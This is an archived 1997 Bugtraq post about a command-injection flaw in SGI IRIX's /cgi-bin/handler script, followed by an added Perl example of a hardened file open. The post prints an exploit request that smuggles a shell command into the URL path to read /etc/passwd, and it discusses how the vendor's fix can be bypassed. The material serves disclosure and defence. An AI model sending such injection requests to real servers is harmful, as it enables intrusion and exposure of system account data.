Bugtraq mailing list archives
Re: /cgi-bin/handler - more notes
From: mouse () RODENTS MONTREAL QC CA (der Mouse)
Date: Fri, 20 Jun 1997 15:37:02 -0400
I have had reports that my exploit for SGI's /cgi-bin/handler does not work on IRIX 6.3 (on O2). I analyzed the code provided with IRIX 6.3 and they tried to fix it, but they actually DID NOT.
telnet target.machine.com 80 GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0
[...To fix this right...] All "open" commands should check if their argument is really a filename. You could use:
-f $doc && open (INPUT, $doc)
If you have untrusted local users who can install their own cgi-bin stuff (I know of at least one large site that is in this situation), this isn't enough. /cgi-bin/handler/whatever;cat\t/etc/passwd\|\t may well exist, and open() will _still_ take it as a pipe.
So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable. Anyone on IRIX 6.4? :) (What does it run on BTW?)
I know of one site with an Octane that runs 6.4. I'd try this, but that site runs exactly one web server, and it ain't SGI's. I could turn on the web server on the Octane, I suppose, but I'm hesitant to mess with it....

der Mouse
mouse () rodents montreal qc ca
7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
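As an added illustration (not code from either poster), the following Perl shows why the suggested "-f $doc && open (INPUT, $doc)" check is not sufficient, and what a hardened replacement looks like: a whitelist on the name, a fixed document root, and three-argument open() with an explicit read mode, which never interprets the name as a pipe. The document root, file names and the safe_open helper are assumptions for the demo.

```perl
#!/usr/bin/perl
# Added example, not from the original post. Demonstrates that a -f test
# before two-argument open() is bypassable, and a hardened alternative.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Two-argument open() parses its argument for mode characters: a trailing
# '|' turns the "filename" into a command pipeline. If an attacker can
# create a file whose name ends in '|', -f succeeds and open() still runs
# a command. Three-argument open() with an explicit '<' mode treats the
# string purely as a path name.
sub safe_open {
    my ($docroot, $name) = @_;
    # Allow only simple relative paths: components of [A-Za-z0-9._-] that
    # do not start with '.', which rules out '..', '/', ';', '|', whitespace.
    return undef
        unless $name =~ m{^([A-Za-z0-9_-][A-Za-z0-9._-]*(?:/[A-Za-z0-9_-][A-Za-z0-9._-]*)*)\z};
    my $path = "$docroot/$1";                  # $1 is the whitelisted copy
    return undef unless -f $path;              # plain file only
    open(my $fh, '<', $path) or return undef;  # explicit mode: never a pipe
    return $fh;
}

# Constructed demo: a throw-away document root holding one legitimate file
# and one file whose name would be parsed as a pipe by two-argument open().
my $root = tempdir(CLEANUP => 1);
for my $f ('readme.txt', 'readme.txt|') {
    open(my $out, '>', "$root/$f") or die "create $f: $!";
    print $out "content of $f\n";
    close $out;
}

for my $req ('readme.txt', 'readme.txt|', '../etc/passwd') {
    my $fh = safe_open($root, $req);
    printf "%-18s -f says: %-8s safe_open: %s\n", "'$req'",
        (-f "$root/$req" ? 'file' : 'no file'),
        ($fh ? 'opened' : 'rejected');
    close $fh if $fh;
}
```

The second request passes the -f test because the file exists, yet safe_open rejects it; the third is rejected by the whitelist before any filesystem access.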